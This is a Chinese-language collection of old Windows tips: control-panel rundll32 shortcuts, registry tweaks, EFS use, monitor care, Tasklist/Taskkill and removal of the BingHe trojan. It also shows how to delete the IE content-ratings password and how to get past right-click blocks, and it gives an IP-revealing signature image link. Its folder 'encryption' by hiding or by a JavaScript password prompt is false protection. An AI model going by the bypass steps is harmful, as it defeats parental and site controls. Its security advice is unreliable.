x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2',9);
{辅助选项 属性-显示}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3',9);
{辅助选项 属性-鼠标}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4',9);
{辅助选项 属性-常规}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5',9);
{添加/删除程序 属性-安装/卸载}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Appwiz.cpl,,1',9);
{添加/删除程序 属性-Windows安装程序}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Appwiz.cpl,,2',9);
{添加/删除程序 属性-启动盘}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Appwiz.cpl,,3',9);
{显示 属性-背景}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0',9);
{显示 属性-屏幕保护程序}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1',9);
{显示 属性-外观}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2',9);
{显示 属性-设置}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3',9);
{Internet 属性-常规}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,0',9);
{Internet 属性-安全}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,1',9);
{Internet 属性-内容}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,2',9);
{Internet 属性-连接}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,3',9);
{Internet 属性-程序}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,4',9);
{Internet 属性-高级}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,5',9);
{区域设置 属性-区域设置}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,0',9);
{区域设置 属性-数字}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,1',9);
{区域设置 属性-货币}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,2',9);
{区域设置 属性-时间}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,3',9);
{区域设置 属性-日期}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,4',9);
{游戏控制器-一般}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Joy.cpl,,0',9);
{游戏控制器-高级}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Joy.cpl,,1',9);
{鼠标 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Main.cpl',9);
{多媒体 属性-音频}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,0',9);
{多媒体 属性-视频}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,1',9);
{多媒体 属性-MIDI}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,2',9);
{多媒体 属性-CD音乐}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,3',9);
{多媒体 属性-设备}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,4',9);
{调制解调器 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Modem.cpl',9);
{网络}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Netcpl.cpl',9);
{密码 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Password.cpl',9);
{扫描仪与数字相机 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sticpl.cpl',9);
{系统 属性-常规}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,0',9);
{系统 属性-设备管理器}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,1',9);
{系统 属性-硬件配置文件}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,2',9);
{系统 属性-性能}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,3',9);
{日期/时间 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL timedate.cpl',9);
{电源管理 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Powercfg.cpl',9);
{拨号属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Telephon.cpl',9);

将图表变为真彩色
HKEY--CURRENT--USER
Control Panel
Control Panel
windowmetrics　　新建字符串值 SHELL ICON BPP “16”

破解IE分级密码

    可用编辑注册表的方法来找回密码，方法是在开始菜单的“运行”中键入“Regedit”命令打开注册表编辑器，随后找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Policies\Ratings主键，在此保存的键值就是IE属性对话框“内容”选项中的“分级审查”中的口令，右侧窗口中的“FileName0”和“Key”两个键值记录了该口令，且二进制的“Key”键值是经过加密的，去掉口令的方法是将Ratings下的这两个子键删除即可。以后再进入IE，就可以安全地进入分级审查了，并且可以跳过输入旧密码，直接输入新密码即可。

破解网页禁用鼠标右键

    1，出现版权信息类的，破解方法：在页面目标上按下鼠标右键，弹出限制窗口，这时不要松开右键，将鼠标指针移到窗口的“确定”按钮上，同时按下左键。松开鼠标左键，限制窗口就被关闭了，再将鼠标移到目标上松开鼠标右键，哈哈，就这样弹出了鼠标右键菜单，限制被取消了！有成就感吧！

    2，出现“添加到收藏夹”的。破解方法：在目标上点鼠标右键，出现添加到收藏夹的窗口，不要松开右键，也不要移动鼠标，而是使用键盘的TAB键，移动到取消按钮上，按下空格键，这时窗口就消失了，松开右键看看，右键又恢复了！

    3，超链接无法用鼠标右键弹出“在新窗口中打开”菜单的。用这一招：在超链接上点击鼠标右键，弹出窗口，不要松开右键，按键盘上的空格键，窗口消失了，这时在松开右键，右键菜单便会出现，选择其中的“在新窗口中打开”就OK了

巧妙清除Windows XP任务栏的隐藏图标记录

在Windows XP中的自动隐藏不活动的图标，可以解决系统托盘区占用过多的任务栏空间。可时间长了，右击任务栏空白处选择“属性”，在 “任务栏”选项中点击“自定义”按钮，会在“过去的项目”栏里看到很多历史记录，删除这些项目的方法是：打开注册表，找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\TrayNotify”，其中“IconStreams”项存储着“当前项目”而“PastIconsStream”项存储着“过去的项目”，将“TrayNotify”项删除，按Ctrl+Alt+Del组合键调出“Windows任务管理器”，单击进程选项卡，选择explorer.exe，结束进程。之后在“Windows任务管理器”中选“文件”→“新建任务”，在“创建新任务”中输入explorer.exe即可。

取消磁盘扫描
    问：我的电脑安装的是Windows XP，最近只要正常关机，再开机就会自动运行磁盘扫描。若是重新启动则不会有这种情况，以前用Windows 98操作系统时也遇到过这种情况，不知该如何解决？

    答：这是因为Windows XP认为你没有正常关机，所以强制性扫描。你可以在命令行提示符里面输入chkntfs /x X:取消对X盘的检查。另外建议你到Windows Update(http://windowsupdate.microsoft.com)上检查你的系统并安装相应的补丁程序。

取消磁盘扫描前的等待时间

    使用Windows XP遇到停电、死机等意外情况，重新启动计算机后会自动进行磁盘扫描操作。在进行磁盘扫描操作之前，系统会给出一个10秒的倒计时时间让选择是否跳过磁盘扫描步骤。可以通过如下的操作来取消磁盘扫描前的倒计时等待时间。

    依次单击“开始→所有程序→附件→命令提示符”，进入命令提示符窗口，然后在命令提示符下键入CHKNTFS /T:0命令，回车后即可将自动磁盘扫描前的初始递减计数时间改成0秒，以后Windows　XP在进行自动磁盘扫描时就不会进行倒计时等待了。

如何保存网页的背景音乐

    打开下载图片的网页，点击IE浏览器的文件菜单，选择“另存为”命令。在弹出的另存为窗口中设置好保存的路径、文件名以及保存类型。保存类型应该选择默认的“Web页，全部”。保存完毕之后就可以打开同文件名的Files文件夹，这里面都是保存下来网页的素材，当然包括你要的图片或网页背景音乐。接下来就可以用Windows的预览功能找到想要的图片或者网页背景音乐复制保存它。

如何彻底删除输入法文件

    先到输入法设置中删除你要删除的输入法，使用搜索功能，搜索到输入法的对应文件删除！
    全拼：Winpy.ime、Winpy.mb、Winpy.hlp、Winpy.cnt。
    双拼：Winsp.ime、Winsp.mb、Winsp.hlp、Winsp.cnt。
    微拼：Pintllime.dll、Pintlgab.imd、Pintlgai.imd、Pintlgb.imd、Pintlgd.imd、 Pintlgdx.imd、Pintlgie.imd、Pintlgnt.cnt、Pintlgnt.hlp、Pintlgnt.i96、 Pintlgnt.ime、Pintlgrb.imd、Pintlgri.imd、Pintlgs.imd、Pintlgsi.imd、Pintlgsx.imd、Pintlgu.imd、Pintlguc..imd、Pintlphr.exe。
    智能ABC：Winabc.cwd、Abcsda.dll、Abcwin.exe、Winabc.ime、Winabc.ovl、tmmr.rem、user.rem、Winabc.hlp、Winabc.cnt。
    郑码：Winzm.ime、Winzm.mb、Winzm.hlp、Winzm.cnt。
    内码输入法：Wingb.mb、Wingb.hlp、Wingb.cnt。
    表形码：Winbx.mb，Winbx.ime，Winbx.hlp，Winbx.cnt。

如何防止恶意网页篡改注册表

    1.升级IE为6.0版本并利用Windows Update下载微软补丁Microsoft Windows Script 5.6；

    2.在“Internet选项”→“安全”→“自定义级别”中将ActiveX插件和控件、Java脚本等全部禁止，不过这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览；

    3.通过修改注册表来禁止恶意网页使用注册表编辑器Regedit，具体做法是：打开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System，在Policies下面新建一个主键，取名System，然后在右边空白处新建一个DWORD串值，名字取为DisableRegistryTools，把它的值修改为1，这样可有效防止恶意网页篡改注册表；

    4.对于Windows98用户，可把C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP中的“ActiveXComponent.class”删掉；

    5.对于WindowsMe用户，可把C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP中的“ActiveXComponent.class”删掉；

    6.对Windows2000用户，可把Windows2000服务里面的远程注册表操作服务“Remote Registry Service”禁用，以防止恶意网页篡改注册表。具体方法为：“管理工具”→“服务”→“Remote Registry Service”(允许远程注册表操作)”，将这一项禁用；

    7.利用第三方软件(比如超级兔子IE保护器、优化大师等)设置来防止；

    8.开启杀毒软件(瑞星、KV杀毒王等)的实时“网页监控”功能。

如何关闭CD自动播放功能

    Win 2000在系统默认情况下具有CD自动播放功能，可以对光驱进行监视。如果我们在光驱中放入CD或VCD光盘，系统就会自动启动相应的程序来播放它们。有时这项功能也会给我们带来不便，尤其在读“烂盘”时，系统就会自动启动多个应用程序,常常搞得我们焦头烂额。为了避免再次陷入类似窘境，我们可以将系统的CD自动播放功能关闭，具体方法如下：

    打开注册表编辑器，进入主键［HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDRom］，将“Autorun”键值更改为0（Hex）。

如何关闭Dr.Watson

    Dr.Watson是Win 2000的一个崩溃分析工具，它会在应用程序崩溃的时候自动弹出，并且在默认情况下，它会将与出错有关的内存存为DUMP文件以供程序员分析。

    不过我们作为普通用户，记录DUMP文件不但毫无用处，而且还有两个极大的缺点：

    1.崩溃的瞬间，会有一个对话框弹出，告知应用程序出错将被关闭。这时，一般伴随有巨型的读盘现象，要过很久程序才能关闭。这是因为Dr.Watson在做内存DUMP。

    2.占用大量磁盘空间。有时DUMP下来的这些文件会占用大量的磁盘空间。

    实际上DRWTSN32是WIN2000默认的出错调试器，如果我们根本不想用它的话，打开注册表编辑器，进入主键［HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AeDebug］，然后将“AUTO”键值设置为0。

NTFS格式下加、解密问题

    NTFS是WinNT以上版本支持的一种提供安全性、可靠性的高级文件系统。在Win2000和WinXP中，NTFS还可以提供诸如文件和文件夹权限、加密、磁盘配额和压缩这样的高级功能。

    一、加密文件或文件夹
    步骤一：打开Windows资源管理器。
    步骤二：右键单击要加密的文件或文件夹，然后单击“属性”。
    步骤三：在“常规”选项卡上，单击“高级”。选中“加密内容以便保护数据”复选框

  在加密过程中还要注意以下五点：
    1.要打开“Windows 资源管理器”，请单击“开始→程序→附件”，然后单击“Windows 资源管理器”。
    2.只可以加密NTFS分区卷上的文件和文件夹，FAT分区卷上的文件和文件夹无效。
    3.被压缩的文件或文件夹也可以加密。如果要加密一个压缩文件或文件夹，则该文件或文件夹将会被解压。
    4.无法加密标记为“系统”属性的文件，并且位于systemroot目录结构中的文件也无法加密。
    5.在加密文件夹时，系统将询问是否要同时加密它的子文件夹。如果选择是，那它的子文件夹也会被加密，以后所有添加进文件夹中的文件和子文件夹都将在添加时自动加密。

    二、解密文件或文件夹
    步骤一：打开Windows资源管理器。
    步骤二：右键单击加密文件或文件夹，然后单击“属性”。
    步骤三：在“常规”选项卡上，单击“高级”。
    步骤四：清除“加密内容以便保护数据”复选框。

    同样，我们在使用解密过程中要注意以下问题：
    1.要打开“Windows资源管理器”，请单击“开始→程序→附件”，然后单击“Windows资源管理器”。
    2.在对文件夹解密时，系统将询问是否要同时将文件夹内的所有文件和子文件夹解密。如果选择仅解密文件夹，则在要解密文件夹中的加密文件和子文件夹仍保持加密。但是，在已解密文件夹内创立的新文件和文件夹将不会被自动加密。

    以上就是使用文件加、解密的方法！而在使用过程中我们也许会遇到以下一些问题，在此作以下说明：
    1.高级按钮不能用
    原因：加密文件系统(EFS)只能处理NTFS文件系统卷上的文件和文件夹。如果试图加密的文件或文件夹在FAT或FAT32卷上，则高级按钮不会出现在该文件或文件夹的属性中。
    解决方案：
    将卷转换成带转换实用程序的NTFS卷。
    打开命令提示符。
    键入：Convert [drive]/fs:ntfs
    (drive 是目标驱动器的驱动器号)
    2.当打开加密文件时，显示“拒绝访问”消息
   原因：加密文件系统(EFS)使用公钥证书对文件加密，与该证书相关的私钥在本计算机上不可用。
    解决方案：
    查找合适的证书的私钥，并使用证书管理单元将私钥导入计算机并在本机上使用。
    3.用户基于NTFS对文件加密，重装系统后加密文件无法被访问的问题的解决方案(注意：重装Win2000/XP前一定要备份加密用户的证书)：
    步骤一：以加密用户登录计算机。
    步骤二：单击“开始→运行”，键入“mmc”，然后单击“确定”。
    步骤三：在“控制台”菜单上，单击“添加/删除管理单元”，然后单击“添加”。
    步骤四：在“单独管理单元”下，单击“证书”，然后单击“添加”。
    步骤五：单击“我的用户账户”，然后单击“完成”(如图2，如果你加密用户不是管理员就不会出现这个窗口，直接到下一步) 。
    步骤六：单击“关闭”，然后单击“确定”。
    步骤七：双击“证书──当前用户”，双击“个人”，然后双击“证书”。
    步骤八：单击“预期目的”栏中显示“加密文件”字样的证书。
    步骤九：右键单击该证书，指向“所有任务”，然后单击“导出”。
    步骤十：按照证书导出向导的指示将证书及相关的私钥以PFX文件格式导出(注意：推荐使用“导出私钥”方式导出，这样可以保证证书受密码保护，以防别人盗用。另外，证书只能保存到你有读写权限的目录下)。
    4.保存好证书
    注意将PFX文件保存好。以后重装系统之后无论在哪个用户下只要双击这个证书文件，导入这个私人证书就可以访问NTFS系统下由该证书的原用户加密的文件夹(注意：使用备份恢复功能备份的NTFS分区上的加密文件夹是不能恢复到非NTFS分区的)。

    最后要提一下，这个证书还可以实现下述用途：
    (1)给予不同用户访问加密文件夹的权限
    将我的证书按“导出私钥”方式导出，将该证书发给需要访问这个文件夹的本机其他用户。然后由他登录，导入该证书，实现对这个文件夹的访问。
    (2)在其也WinXP机器上对用“备份恢复”程序备份的以前的加密文件夹的恢复访问权限
    将加密文件夹用“备份恢复”程序备份，然后把生成的Backup.bkf连同这个证书拷贝到另外一台WinXP机器上，用“备份恢复”程序将它恢复出来(注意：只能恢复到NTFS分区)。然后导入证书，即可访问恢复出来的文件了。

Win98加密文件夹四法

一、文件夹属性法

    在“Windows资源管理器”窗口，右键单击要加密的文件夹，单击“属性”，选中“隐藏”复选框。在注册表的“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL”分支下，将“CheckedValue”的键值设置为数字“0”。以后，即使在“Windows资源管理器”窗口，单击“查看”菜单中的“文件夹选项”，单击“查看”选项卡，选中“显示所有文件”复选钮，也无法看到具有隐藏属性的文件夹。

二、“回收站”法

    首先确认选中了“显示所有文件”复选钮，并且注册表中“CheckedValue”的键值为“1”。然后，在“Windows资源管理器”窗口，右键单击“C:\RECYCLED”文件夹(这是C盘上“回收站”对应的文件夹)，再单击“属性”，单击“常规”选项卡，清除“启用缩略图方式查看”和“只读”复选框，单击“确定”按钮。关闭并重新启动“Windows资源管理器”后，将会看到“C:\RECYCLED”文件夹中有一个desktop.ini文件。把该文件复制到要加密的文件夹中，并把该文件夹设为“只读”属性。

三、“文件管理器”法

    单击“开始/运行”，键入“winfile”，单击“确定”按钮，打开“文件管理器”窗口，单击“查看”菜单中的“按文件类型”，选中“显示隐藏/系统文件”复选框，单击“确定”按钮。把要加密的文件夹拖到“C:\RECYCLED”文件夹或者其他分区的“RECYCLED”文件夹。这样，在“我的电脑”或“Windows资源管理器”窗口中就看不到这个文件夹了。

四、设置密码法

    1、打开“资源管理器”，选定要加密或要保护的文件夹(文件目录)，在其中空白处单击鼠标右键，选择“自定义文件夹…”选项；
    2、在“自定义文件夹”的复选框中，选择“创建或编辑HTML文档”，并单击“下一步”，系统准备启动HTML编辑器；
    3、单击“下一步”，系统启动HTML编辑器，自动打开Folder.htt文档；
    4、编辑Folder.htt文档，搜索“JavaScript”字符，在下方顶头输入以下3行内容：

    var pass = prompt("请输入密码")

    if(pass != "ABC")

    {window.location="E:"};

    5、保存Folder.htt文档并退出编辑，选择“完成”；到此，对文件夹的加密或保护便已完成；
    6、加密测试，关闭已打开的所有文档及文件夹，重新打开“资源管理器”，点击已加密的文件夹，系统便会提示输入密码，输入正确的密码(本文设定的密码为ABC)就可以访问该文件夹，反之则会转入E盘而无法访问，从而保护该文件夹及其中的文档。

如何进入BIOS设置?

    不同的BIOS有不同的进入方法，通常会在开机画面有提示。
    Award BIOS：按“Del”键
    AMI BIOS：按“Del”或“ESC”键
    Phoenix BIOS：按“F2”键
    Compaq（康柏）按“F10”键

如何启动休眠功能

    问：我的电脑安装的是Windows XP和Windows 2000双系统，现在两个系统里的休眠功能都无法使用，在BIOS中已设置过了，请问我该怎么办？

    答：必须以Administrators或Power Users群组成员的身分登录。在Windows XP中进入“控制面板→性能和维护→电源选项”，在Windows 2000中选择进入“控制面板→电源选项”，进入“休眠”项，然后勾选“启用休眠”一项，再按下“确定”关闭电源选项对话框即可。如果休眠选项不可进入，则表示你的硬件设备无法支持休眠特性。

如何清除冰河

冰河可以说是最有名的木马了。标准版冰河的服务器端程序为G-server.exe，客户端程序为G-client.exe，默认连接端口为7626。

一旦运行G-server，那么该程序就会在C:\Windows\system目录下生成Kernel32.exe和sysexplr.exe，并删除自身。Kernel32.exe在系统启动时自动加载运行，sysexplr.exe和TXT文件关联。即使你删除了Kernel32.exe，但只要你打开TXT文件，sysexplr.exe就会被激活，它将再次生成Kernel32.exe，于是冰河又回来了！这就是冰河屡删不止的原因。

要清除冰河，首先要删除C:\Windows\system下的Kernel32.exe和Sysexplr.exe文件；冰河会在注册表的HKEY_LOCAL_MACHINE\ software\ microsoft\ Windows\CurrentVersion\Run分支下扎根，键值为C:\Windows\system\Kernel32. exe，删除它。在注册表的HKEY_LOCAL_ MACHINE\ software\microsoft\Windows\Current Version\Runservices分支下，还有键值为C:\Windows\system\ Kernel32.exe的，也要删除。

最后，恢复注册表中的TXT文件关联功能,只要将注册表的HKEY_CLASSES_ROOT\txtfile\ shell\open\command下的默认值，由中木马后的C:\Windows\system\ Sysexplr.exe %1改为正常情况下的C:\Windows\ notepad.exe %1即可。

如何让注册表保持在根目录

Windows XP 在打开[Regedit]时会停留在上次使用时的位置，可按下列修改后打开Regedit时便会停在根目录上：
在[开始]-->[运行]-->键入[Regedit,HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit,选择LastKey，清除其有关数值数据，然后在左边窗口上的Regedit右点鼠标，择选权限，在Administrators 的权限上全部选拒绝。

如何设置从光驱启动

    计算机启动还在自检(屏幕为黑屏白字，同时在屏幕右上角还显示一个图标)时按住键盘上的“Del”键，即可进入“CMOS Setup Utility”界面，利用光标移动键选择“Advanced BIOS Features”，敲回车键进入该项设置并选择“First Boot Device”项，利用“Page Up”或“Page Down”两个键将它修改为相应项，即如果你用光盘启动则更改为“CDROM”，而若用软盘启动则应修改为“Floppy”；最后按F10键并敲回车键保存设置后退出BIOS设置。然后放入相应启动盘便可从该盘进行启动了。

设置“显别人的IP”

{img}http://dqdj.51.net/ip/3.php{/img}
{}换成[]

除了上面这个，再给你一个网址：
http://www.danasoft.com/sig-chi.jpg

电脑显示器的相关设置与常见故障排除方法

    一、如何达到最佳使用效果

    1.显示器刷新率的设置：刷新率即场频，指每秒钟重复绘制画面的次数，以hz为单位。刷新率越高，画面显示越稳定，闪烁感就越小。一般人的眼睛对于75hz以上的刷新率基本感觉不到闪烁，85hz以上则完全没有闪烁感，所以vesa国际视频协会将85hz逐行扫描制定为无闪烁标准。普通彩色电视机的刷新率只有50hz，目前电脑输出到显示器最低的刷新率是60hz，建议大家使用85hz的刷新率。

    2.显示器分辨率的设置：分辨率是定义画面解析度的标准，由每桢画面的像素数量决定。以水平显示的图像个数x水平扫描线数表示，如1024×768，表示一幅图像由1024×768个点组成。分辨率越高，显示的图像就越清晰，但这并不是说把分辨率设置的越高越好，因为显示器的分辨率最终是由显像管的尺寸和点距所决定的。建议使用以下分辨率/刷新率：14英寸和15英寸显示器，800×600/85hz；17英寸显示器，1024×768/85hz；19英寸及19英寸以上显示器，1280×1024/85hz。现在市场上的名牌显示器基本都能达到上述指标。

    3.显示色彩的设置：显示器可以显示无限种颜色，目前普通电脑的显卡可以显示32位真彩、24位真彩、16位增强色、256色。除256色外，大家可以根据自己的需要在显卡的允许范围之内随意选择。很多用户有一种错误概念，认为256色是最高级的选项，而实际上正好相反。256色是最低级的选项，它已不能满足彩色图像的显示需要。16位不是16种颜色，而是2的16次平方(256×256)种颜色，但256色就是256(2的8次平方)种颜色。所以16位色要比256色丰富得多。

    4.视频保护和休眠状态的设置：显示器是电脑设备里淘汰最慢的产品。5年前购买的14英寸彩显现在也可以使用，但如果谁还使用5年前的cpu、内存和硬盘等，那他一定是个收藏家。显示器的寿命主要取决于显像管的寿命。世界各大著名的显示器厂商所使用的显像管寿命相差无几，基本都在12000小时以内。用户的使用方法对显像管寿命有很大影响。所以建议大家设置显示器视保和休眠状态。一般进入视保时间为几分钟左右，进入休眠时间为10分钟左右。视保状态可以在你暂时不使用电脑时避免显像管被电子束灼伤。休眠状态可以在你长时间不使用电脑时自动关闭显示器。休眠状态的显示器只有cpu在工作，能耗只有通常状态下的5%左右，既延长显示器的使用时间又节约电能。

    注意以上4项设置都是在微机上进行的，在控制面板的显示器属性选项里进行设置，显示器本身不能进行以上设置。

    二、使用维护注意事项

    1.显示器的放置应尽量远离强磁场，如高压电线、音箱等，否则显像管容易被磁化。

    2.使用时尽量将显示器面向东方，因显示器出厂调整是面向东方进行的，这样可以使显示器受地球磁场的影响最小。

    3.应尽量避免灰尘进入，但在使用时不能用物品将显示器遮盖，否则热量散发不出去，导致显示器内部温升过高而损坏机器。

    4.避免阳光直射屏幕，否则容易使显像管老化。

    5.对比度可设置为最大，但亮度最好设置为最大值的70%～70%，亮度太高对眼睛不利，且缩短显示器的使用寿命。

    6.清洁屏幕：只能用柔软的干棉布擦拭屏幕的灰尘，注意不要使用硬质物品，也不能沾水或清洁剂擦拭，否则会损坏屏幕表面的防辐射及抗静电镀膜。

    7.清洁外壳：用棉布沾清水擦拭，不要使用任何清洁剂，否则会使外壳失去出厂时的特有光泽。

    三、简单故障处理

    1.屏幕无显示，前面板的指示闪烁：检查显示器与微机的信号线连接是否牢固，并检查信号线的接插口是否有插针折断、弯曲。

    2.显示形状失真的校正：现今的显示器都是数字控制，用户可以通过控制选单进行倾斜、梯形、线形、幅度等校正。高档次显示器可以进行聚焦、汇聚、色彩等校正。

    3.屏幕黑屏并显示“信号超出同步范围”(以三星显示器为例，各种品牌显示的内容不同)：当微机发出的信号超出显示器的显示范围，显示器检测到异常信号停止工作。用户可以先关闭显示器，再打开，然后重新设置微机的输出频率。

    4.关机时屏幕中心有亮点：应立即送维修中心修理。这种现象是由于显示器电路或显像管本身问题造成的，虽然当时不影响使用，但时间一长，显像管被灼伤，中央出现黑斑，此时再修理，保修期已过，用户利益受到损失。

    5.屏幕显示有杂色：通过显示器的前面板的消磁控制功能进行消磁，但不要在半小时内重复消磁。

    6.色彩种类不能上到32位：显卡问题，检查显卡是否具有此项性能及显卡的驱动程序是否安装。

    7.分辨率/刷新率上不去：多数情况下是使用问题。先检查显卡及显示器的驱动程序是否已安装(如果厂家提供的话)，然后根据使用说明书检查显卡及显示器是否可以达到你所要求的性能。如果一切正常，那就是显示器故障，只能联系维修中心解决。

如何实现关机时清空页面文件

    打开“控制面板”，单击“管理工具→本地安全策略→本地策略→安全选项”，双击其中“关机：清理虚拟内存页面文件”一项，单击弹出菜单中的“已启用”选项，单击“确定”即可。

如何使IE不再发送错误报告

问题描述 ：
    在使用IE浏览网页的过程中，出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时，如果单击“发送错误报告”按钮，则会创建错误报告，单击“关闭”按钮之后会引起当前IE窗口关闭；如果单击“不发送”按钮，则会关闭所有IE窗口。

故障原因及解决方案 ：
    这是IE为了解用户在使用中的错误而设计的一个小程序。
    针对不同情况，可分别用以下方法关闭IE发送错误报告功能:

1.对IE5.x用户，执行“控制面板→添加或删除程序”，在列表中选择“Internet Explorer error reporting”选项，然后单击“更改/删除”按钮，将其从系统中删除。
2. 对windows 9x/me/nt/2000下的IE 6.0用户，则可打开“注册表编辑器”，找到[hkey_local_machine＼software ＼microsoft＼internet explorer＼main]，在右侧窗格创建名为iewatsonenabled的dword双字节值，并将其赋值为0。
3.对windows XP的IE 6.0用户，执行“控制面板→系统”，切换到“高级”选项卡，单击“错误报告”按钮，选中“禁用错误报告”选项，并选中“但在发生严重错误时通知我”，最后单击“确定”按钮。

如何使用Tasklist命令

    Tasklist命令用来显示运行在本地或远程计算机上的所有进程，带有多个执行参数。

    使用格式
    Tasklist [/S system [/U username [/P [password]]]] [/M [module] | /SVC | /V] [/FI filter] [/FO format] [/NH]

    参数含义
    /S system　指定连接到的远程系统。

    /U [domain\]user　指定使用哪个用户执行这个命令。

    /P [password]　为指定的用户指定密码。

    /M [module]　列出调用指定的DLL模块的所有进程。如果没有指定模块名，显示每个进程加载的所有模块。

    /SVC　显示每个进程中的服务。

    /V　显示详细信息。

    /FI filter　显示一系列符合筛选器指定的进程。

    /FO format　指定输出格式，有效值：TABLE、LIST、CSV。

    /NH　指定输出中不显示栏目标题。只对TABLE和CSV格式有效。

    应用实例。
    1.查看本机进程
    在“命令提示符”中输入Tasklist命令即可显示本机的所有进程(图1)。本机的显示结果由5部分组成：图像名(进程名)、PID、会话名、会话#和内存使用。

    2.查看远程系统的进程
    在命令提示符下输入“Tasklist /s 218.22.123.26 /u jtdd /p 12345678”(不包括引号)即可查看到IP地址为218.22.123.26的远程系统的进程(图2)。其中/s参数后的“218.22.123.26”指要查看的远程系统的IP地址，/u后的“jtdd”指Tasklist命令使用的用户账号，它必须是远程系统上的一个合法账号，/p后的“12345678”指jtdd账号的密码。
    注意：使用Tasklist命令查看远程系统的进程时，需要远程机器的RPC服务的支持，否则，该命令不能正常使用。

    3.查看系统进程提供的服务
    Tasklist命令不但可以查看系统进程，而且还可以查看每个进程提供的服务。如查看本机进程SVCHOST.EXE提供的服务，在命令提示符下输入“Tasklist /svc”命令即可(图3)。你会惊奇地发现，有4个SVCHOST.EXE进程，而总共有二十几项服务使用这个进程。
    对于远程系统来说，查看系统服务也很简单，使用“Tasklist /s 218.22.123.26 /u jtdd /p 12345678 /svc”命令，就可以查看IP地址为218.22.123.26的远程系统进程所提供的服务。

    4.查看调用DLL模块文件的进程列表
    要查看本地系统中哪些进程调用了shell32.dll模块文件，只需在命令提示符下输入“Tasklist /m shell32.dll”即可显示这些进程的列表。

    5.使用筛选器查找指定的进程
    在命令提示符下输入“TASKLIST /FI "USERNAME ne NT AUTHORITY\SYSTEM" /FI "STATUS eq running”，就可以列出系统中正在运行的非SYSTEM状态的所有进程。其中“/FI”为筛选器参数，“ne”和“eq”为关系运算符“不相等”和“相等”。

    小提示
    谈到“Tasklist”命令，我们就不得不提到它的孪生兄弟“Taskkill”命令，顾名思义，它是用来关掉进程的。
    要关掉本机的notepad.exe进程，有两种方法：
    1.先使用Tasklist查找它的PID，假设系统显示本机notepad.exe进程的PID值为1132，然后运行“Taskkill /pid 1132”命令即可。其中“/pid”参数后面是要终止进程的PID值。
    2.直接运行“Taskkill /IM notepad.exe”命令，其中“/IM”参数后面为进程的图像名。

如何使用系统还原

    以Windows XP为例，介绍几个常用技巧。

    一、关闭系统还原
    系统还原功能一旦开启，系统便会定期进行备份，时间一长，系统还原记录就会占用大量的硬盘空间，禁用方法是：右击“我的电脑”，选择“属性”，进入“系统还原”选项卡，勾选“在所有驱动器上关闭系统还原”项即可。

    二、部分禁用还原
    如果使用系统还原只是为了恢复系统的话，那么只需给系统分区设置还原功能即可。设置方法是：打开“系统还原”窗口(方法同上)，在“可用的驱动器”栏中依次选择非系统分区，并点“设置”，在“驱动器设置” 窗口中勾选“关闭这个驱动器上的‘系统还原’”复选框即可。

    三、修改占用空间的最小值
